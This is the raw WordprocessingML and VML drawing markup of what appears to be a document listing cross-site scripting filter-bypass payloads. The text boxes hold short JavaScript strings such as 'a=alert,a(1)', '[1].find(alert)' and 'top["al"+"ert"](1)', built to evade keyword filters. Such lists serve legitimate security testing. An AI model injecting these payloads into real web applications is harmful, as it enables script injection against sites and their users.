                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="42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716 667"/>
                            <a:gd name="T3" fmla="*/ 716 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 716 667"/>
                            <a:gd name="T7" fmla="*/ 716 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 715 667"/>
                            <a:gd name="T11" fmla="*/ 715 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 695 667"/>
                            <a:gd name="T15" fmla="*/ 695 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 688 667"/>
                            <a:gd name="T19" fmla="*/ 688 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 667 667"/>
                            <a:gd name="T23" fmla="*/ 667 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 667 667"/>
                            <a:gd name="T27" fmla="*/ 667 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 692 667"/>
                            <a:gd name="T31" fmla="*/ 692 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 695 667"/>
                            <a:gd name="T35" fmla="*/ 695 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 716 667"/>
                            <a:gd name="T39" fmla="*/ 71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57BD7" id="Freeform 43" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:33.35pt;width:2.45pt;height:2.45pt;z-index:-15455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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,25r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,454660;13335,454660;11430,454025;0,441325;0,436880;13335,423545;17780,423545;31115,439420;31115,441325;17780,4546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6124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377825</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="687070" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="39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070" cy="116205"/>
                          <a:chOff x="1930" y="595"/>
                          <a:chExt cx="1082" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="40" name="Freeform 42"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="594"/>
                            <a:ext cx="1082" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 2991 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1082"/>
                              <a:gd name="T2" fmla="+- 0 777 595"/>
                              <a:gd name="T3" fmla="*/ 777 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1082"/>
                              <a:gd name="T6" fmla="+- 0 777 595"/>
                              <a:gd name="T7" fmla="*/ 777 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1082"/>
                              <a:gd name="T10" fmla="+- 0 776 595"/>
                              <a:gd name="T11" fmla="*/ 776 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1082"/>
                              <a:gd name="T14" fmla="+- 0 756 595"/>
                              <a:gd name="T15" fmla="*/ 756 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1082"/>
                              <a:gd name="T18" fmla="+- 0 752 595"/>
                              <a:gd name="T19" fmla="*/ 752 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1082"/>
                              <a:gd name="T22" fmla="+- 0 616 595"/>
                              <a:gd name="T23" fmla="*/ 616 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1082"/>
                              <a:gd name="T26" fmla="+- 0 595 595"/>
                              <a:gd name="T27" fmla="*/ 595 h 183"/>
                              <a:gd name="T28" fmla="+- 0 2991 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1082"/>
                              <a:gd name="T30" fmla="+- 0 595 595"/>
                              <a:gd name="T31" fmla="*/ 595 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3012 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1082"/>
                              <a:gd name="T34" fmla="+- 0 616 595"/>
                              <a:gd name="T35" fmla="*/ 616 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3012 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1082"/>
                              <a:gd name="T38" fmla="+- 0 756 595"/>
                              <a:gd name="T39" fmla="*/ 756 h 183"/>
                              <a:gd name="T40" fmla="+- 0 2994 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1082"/>
                              <a:gd name="T42" fmla="+- 0 776 595"/>
                              <a:gd name="T43" fmla="*/ 776 h 183"/>
                              <a:gd name="T44" fmla="+- 0 2991 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1082"/>
                              <a:gd name="T46" fmla="+- 0 777 595"/>
                              <a:gd name="T47" fmla="*/ 77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2" h="183">
                                <a:moveTo>
                                  <a:pt x="1061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061" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1082" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1064" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1061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594"/>
                            <a:ext cx="108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a=alert,a(1)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" o:spid="_x0000_s2277" style="position:absolute;margin-left:96.5pt;margin-top:29.75pt;width:54.1pt;height:9.15pt;z-index:-15455232;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,595" coordsize="108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">
                <v:shape id="Freeform 42" o:spid="_x0000_s2278" style="position:absolute;left:1930;top:594;width:1082;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1082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7CMsIA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCMBi+D/wP4RV2m6nbGKUaRQeOwXaYHxdvL83b&#10;pti8KUms1V+/HASPD8/3fDnYVvTkQ+NYwXSSgSAunW64VnDYb15yECEia2wdk4IrBVguRk9zLLS7&#10;8Jb6XaxFCuFQoAITY1dIGUpDFsPEdcSJq5y3GBP0tdQeLynctvI1yz6kxYZTg8GOPg2Vp93ZKqjt&#10;19pufqrc/B7Q385/ff52rJR6Hg+rGYhIQ3yI7+5vreA9rU9f0g+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/sIywgAAANsAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m1061,182l21,182r-3,-1l,161r,-4l,21,21,,1061,r21,21l1082,161r-18,20l1061,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1061,777;21,777;18,776;0,756;0,752;0,616;21,595;1061,595;1082,616;1082,756;1064,776;1061,777" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 41" o:spid="_x0000_s2279" type="#_x0000_t202" style="position:absolute;left:1930;top:594;width:1082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YoMcUA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvDUbR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igxxQAAANs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a=alert,a(1)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6176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640080</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="38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056 1008"/>
                            <a:gd name="T3" fmla="*/ 1056 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 1056 1008"/>
                            <a:gd name="T7" fmla="*/ 1056 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 1056 1008"/>
                            <a:gd name="T11" fmla="*/ 1056 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1035 1008"/>
                            <a:gd name="T15" fmla="*/ 1035 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1029 1008"/>
                            <a:gd name="T19" fmla="*/ 1029 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1008 1008"/>
                            <a:gd name="T23" fmla="*/ 1008 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1008 1008"/>
                            <a:gd name="T27" fmla="*/ 1008 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1032 1008"/>
                            <a:gd name="T31" fmla="*/ 1032 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1035 1008"/>
                            <a:gd name="T35" fmla="*/ 1035 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 1056 1008"/>
                            <a:gd name="T39" fmla="*/ 105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913CD" id="Freeform 39" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:50.4pt;width:2.45pt;height:2.45pt;z-index:-15454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" path="m28,48r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,48xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,670560;13335,670560;11430,670560;0,657225;0,653415;13335,640080;17780,640080;31115,655320;31115,657225;17780,67056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6227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593725</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="848995" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="35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8995" cy="116205"/>
                          <a:chOff x="1930" y="935"/>
                          <a:chExt cx="1337" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="36" name="Freeform 38"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="934"/>
                            <a:ext cx="1337" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3246 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1337"/>
                              <a:gd name="T2" fmla="+- 0 1117 935"/>
                              <a:gd name="T3" fmla="*/ 1117 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1337"/>
                              <a:gd name="T6" fmla="+- 0 1117 935"/>
                              <a:gd name="T7" fmla="*/ 1117 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1337"/>
                              <a:gd name="T10" fmla="+- 0 1116 935"/>
                              <a:gd name="T11" fmla="*/ 1116 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1337"/>
                              <a:gd name="T14" fmla="+- 0 1096 935"/>
                              <a:gd name="T15" fmla="*/ 1096 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1337"/>
                              <a:gd name="T18" fmla="+- 0 1093 935"/>
                              <a:gd name="T19" fmla="*/ 1093 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1337"/>
                              <a:gd name="T22" fmla="+- 0 956 935"/>
                              <a:gd name="T23" fmla="*/ 956 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1337"/>
                              <a:gd name="T26" fmla="+- 0 935 935"/>
                              <a:gd name="T27" fmla="*/ 935 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3246 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1337"/>
                              <a:gd name="T30" fmla="+- 0 935 935"/>
                              <a:gd name="T31" fmla="*/ 935 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3267 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1337"/>
                              <a:gd name="T34" fmla="+- 0 956 935"/>
                              <a:gd name="T35" fmla="*/ 956 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3267 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1337"/>
                              <a:gd name="T38" fmla="+- 0 1096 935"/>
                              <a:gd name="T39" fmla="*/ 1096 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3249 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1337"/>
                              <a:gd name="T42" fmla="+- 0 1116 935"/>
                              <a:gd name="T43" fmla="*/ 1116 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3246 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1337"/>
                              <a:gd name="T46" fmla="+- 0 1117 935"/>
                              <a:gd name="T47" fmla="*/ 111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7" h="183">
                                <a:moveTo>
                                  <a:pt x="131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316" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1337" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1319" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131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934"/>
                            <a:ext cx="133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[1].find(alert)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2280" style="position:absolute;margin-left:96.5pt;margin-top:46.75pt;width:66.85pt;height:9.15pt;z-index:-15454208;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,935" coordsize="133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">
                <v:shape id="Freeform 38" o:spid="_x0000_s2281" style="position:absolute;left:1930;top:934;width:1337;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="133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7qm8cA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvJS6UUFDdBX/tCD0IKYieHtk&#10;n8m22bchu2rsp+8WCj0OM/MbZrbobC2u1HrjWMGgn4AgLpw2XCo4fLy9pCB8QNZYOyYFd/KwmD8+&#10;zDDT7sZ7uuahFBHCPkMFVQhNJqUvKrLo+64hjt7ZtRZDlG0pdYu3CLe1HCbJWFo0HBcqbGhdUfGV&#10;X6yC19PxMDCf792kXOc7k96fv1cbUqr31C2nIAJ14T/8195qBaMx/H6JP0D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u6pvHAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m1316,182l21,182r-3,-1l,161r,-3l,21,21,,1316,r21,21l1337,161r-18,20l1316,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1316,1117;21,1117;18,1116;0,1096;0,1093;0,956;21,935;1316,935;1337,956;1337,1096;1319,1116;1316,1117" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 37" o:spid="_x0000_s2282" type="#_x0000_t202" style="position:absolute;left:1930;top:934;width:133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Vmo8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WajxQAAANs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[1].find(alert)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6278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863600</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="34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409 1360"/>
                            <a:gd name="T3" fmla="*/ 1409 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 1409 1360"/>
                            <a:gd name="T7" fmla="*/ 1409 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 1408 1360"/>
                            <a:gd name="T11" fmla="*/ 1408 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1387 1360"/>
                            <a:gd name="T15" fmla="*/ 1387 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1381 1360"/>
                            <a:gd name="T19" fmla="*/ 1381 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1360 1360"/>
                            <a:gd name="T23" fmla="*/ 1360 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1360 1360"/>
                            <a:gd name="T27" fmla="*/ 1360 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1384 1360"/>
                            <a:gd name="T31" fmla="*/ 1384 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1387 1360"/>
                            <a:gd name="T35" fmla="*/ 1387 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 1409 1360"/>
                            <a:gd name="T39" fmla="*/ 140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7F753" id="Freeform 35" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:68pt;width:2.45pt;height:2.45pt;z-index:-15453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" path="m28,49r-7,l18,48,,27,,21,21,r7,l49,24r,3l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,894715;13335,894715;11430,894080;0,880745;0,876935;13335,863600;17780,863600;31115,878840;31115,880745;17780,89471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6329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817245</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1003300" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="3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3300" cy="116205"/>
                          <a:chOff x="1930" y="1287"/>
                          <a:chExt cx="1580" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="32" name="Freeform 34"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1930" y="1287"/>
                            <a:ext cx="1580" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3489 1930"/>
                              <a:gd name="T1" fmla="*/ T0 w 1580"/>
                              <a:gd name="T2" fmla="+- 0 1469 1287"/>
                              <a:gd name="T3" fmla="*/ 1469 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1951 1930"/>
                              <a:gd name="T5" fmla="*/ T4 w 1580"/>
                              <a:gd name="T6" fmla="+- 0 1469 1287"/>
                              <a:gd name="T7" fmla="*/ 1469 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1948 1930"/>
                              <a:gd name="T9" fmla="*/ T8 w 1580"/>
                              <a:gd name="T10" fmla="+- 0 1469 1287"/>
                              <a:gd name="T11" fmla="*/ 1469 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1930 1930"/>
                              <a:gd name="T13" fmla="*/ T12 w 1580"/>
                              <a:gd name="T14" fmla="+- 0 1448 1287"/>
                              <a:gd name="T15" fmla="*/ 1448 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1930 1930"/>
                              <a:gd name="T17" fmla="*/ T16 w 1580"/>
                              <a:gd name="T18" fmla="+- 0 1445 1287"/>
                              <a:gd name="T19" fmla="*/ 1445 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1930 1930"/>
                              <a:gd name="T21" fmla="*/ T20 w 1580"/>
                              <a:gd name="T22" fmla="+- 0 1308 1287"/>
                              <a:gd name="T23" fmla="*/ 1308 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1951 1930"/>
                              <a:gd name="T25" fmla="*/ T24 w 1580"/>
                              <a:gd name="T26" fmla="+- 0 1287 1287"/>
                              <a:gd name="T27" fmla="*/ 1287 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3489 1930"/>
                              <a:gd name="T29" fmla="*/ T28 w 1580"/>
                              <a:gd name="T30" fmla="+- 0 1287 1287"/>
                              <a:gd name="T31" fmla="*/ 1287 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3510 1930"/>
                              <a:gd name="T33" fmla="*/ T32 w 1580"/>
                              <a:gd name="T34" fmla="+- 0 1308 1287"/>
                              <a:gd name="T35" fmla="*/ 1308 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3510 1930"/>
                              <a:gd name="T37" fmla="*/ T36 w 1580"/>
                              <a:gd name="T38" fmla="+- 0 1448 1287"/>
                              <a:gd name="T39" fmla="*/ 1448 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3492 1930"/>
                              <a:gd name="T41" fmla="*/ T40 w 1580"/>
                              <a:gd name="T42" fmla="+- 0 1469 1287"/>
                              <a:gd name="T43" fmla="*/ 1469 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3489 1930"/>
                              <a:gd name="T45" fmla="*/ T44 w 1580"/>
                              <a:gd name="T46" fmla="+- 0 1469 1287"/>
                              <a:gd name="T47" fmla="*/ 146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80" h="183">
                                <a:moveTo>
                                  <a:pt x="155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559" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1580" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1562" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="155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287"/>
                            <a:ext cx="158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 w:hAns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 w:hAnsi="Lucida Console"/>
                                  <w:color w:val="36454E"/>
                                  <w:w w:val="90"/>
                                  <w:sz w:val="15"/>
                                </w:rPr>
                                <w:t>top[“al”+”ert”](1)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2283" style="position:absolute;margin-left:96.5pt;margin-top:64.35pt;width:79pt;height:9.15pt;z-index:-15453184;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1930,1287" coordsize="158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">
                <v:shape id="Freeform 34" o:spid="_x0000_s2284" style="position:absolute;left:1930;top:1287;width:1580;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="158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q42sEA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE70L/w/IKvemmEYqkriIWoTepxvtr9pkE&#10;s2/j7jOm/75bKHgcZuYbZrkeXacGCrH1bOB1loEirrxtuTZQHnfTBagoyBY7z2TghyKsV0+TJRbW&#10;3/mLhoPUKkE4FmigEekLrWPVkMM48z1x8s4+OJQkQ61twHuCu07nWfamHbacFhrsadtQdTncnIGQ&#10;i/+e93vZ46n9GHR5PVbl1ZiX53HzDkpolEf4v/1pDcxz+PuSfoBe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KuNrBAAAA2wAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m1559,182l21,182r-3,l,161r,-3l,21,21,,1559,r21,21l1580,161r-18,21l1559,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1559,1469;21,1469;18,1469;0,1448;0,1445;0,1308;21,1287;1559,1287;1580,1308;1580,1448;1562,1469;1559,1469" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 33" o:spid="_x0000_s2285" type="#_x0000_t202" style="position:absolute;left:1930;top:1287;width:158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goMUA&#10;AADbAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE7wX/w/KE3pqNF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mCgxQAAANs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 w:hAnsi="Lucida Console"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console" w:hAnsi="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:w w:val="90"/>
                            <w:sz w:val="15"/>
                          </w:rPr>
                          <w:t>top[“al”+”ert”](1)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6380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1079500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="31115" cy="31115"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="30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1749 1700"/>
                            <a:gd name="T3" fmla="*/ 1749 h 49"/>
                            <a:gd name="T4" fmla="+- 0 1769 1748"/>
                            <a:gd name="T5" fmla="*/ T4 w 49"/>
                            <a:gd name="T6" fmla="+- 0 1749 1700"/>
                            <a:gd name="T7" fmla="*/ 1749 h 49"/>
                            <a:gd name="T8" fmla="+- 0 1766 1748"/>
                            <a:gd name="T9" fmla="*/ T8 w 49"/>
                            <a:gd name="T10" fmla="+- 0 1748 1700"/>
                            <a:gd name="T11" fmla="*/ 1748 h 49"/>
                            <a:gd name="T12" fmla="+- 0 1748 1748"/>
                            <a:gd name="T13" fmla="*/ T12 w 49"/>
                            <a:gd name="T14" fmla="+- 0 1728 1700"/>
                            <a:gd name="T15" fmla="*/ 1728 h 49"/>
                            <a:gd name="T16" fmla="+- 0 1748 1748"/>
                            <a:gd name="T17" fmla="*/ T16 w 49"/>
                            <a:gd name="T18" fmla="+- 0 1721 1700"/>
                            <a:gd name="T19" fmla="*/ 1721 h 49"/>
                            <a:gd name="T20" fmla="+- 0 1769 1748"/>
                            <a:gd name="T21" fmla="*/ T20 w 49"/>
                            <a:gd name="T22" fmla="+- 0 1700 1700"/>
                            <a:gd name="T23" fmla="*/ 1700 h 49"/>
                            <a:gd name="T24" fmla="+- 0 1776 1748"/>
                            <a:gd name="T25" fmla="*/ T24 w 49"/>
                            <a:gd name="T26" fmla="+- 0 1700 1700"/>
                            <a:gd name="T27" fmla="*/ 1700 h 49"/>
                            <a:gd name="T28" fmla="+- 0 1797 1748"/>
                            <a:gd name="T29" fmla="*/ T28 w 49"/>
                            <a:gd name="T30" fmla="+- 0 1724 1700"/>
                            <a:gd name="T31" fmla="*/ 1724 h 49"/>
                            <a:gd name="T32" fmla="+- 0 1797 1748"/>
                            <a:gd name="T33" fmla="*/ T32 w 49"/>
                            <a:gd name="T34" fmla="+- 0 1728 1700"/>
                            <a:gd name="T35" fmla="*/ 1728 h 49"/>
                            <a:gd name="T36" fmla="+- 0 1776 1748"/>
                            <a:gd name="T37" fmla="*/ T36 w 49"/>
                            <a:gd name="T38" fmla="+- 0 1749 1700"/>
                            <a:gd name="T39" fmla="*/ 174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44879" id="Freeform 31" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.4pt;margin-top:85pt;width:2.45pt;height:2.45pt;z-index:-15452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" path="m28,49r-7,l18,48,,28,,21,21,r7,l49,24r,4l28,49xe" fillcolor="black" stroked="f">
                <v:fill opacity="57054f"/>
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="17780,1110615;13335,1110615;11430,1109980;0,1097280;0,1092835;13335,1079500;17780,1079500;31115,1094740;31115,1097280;17780,111061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6432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1033145</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1751965" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
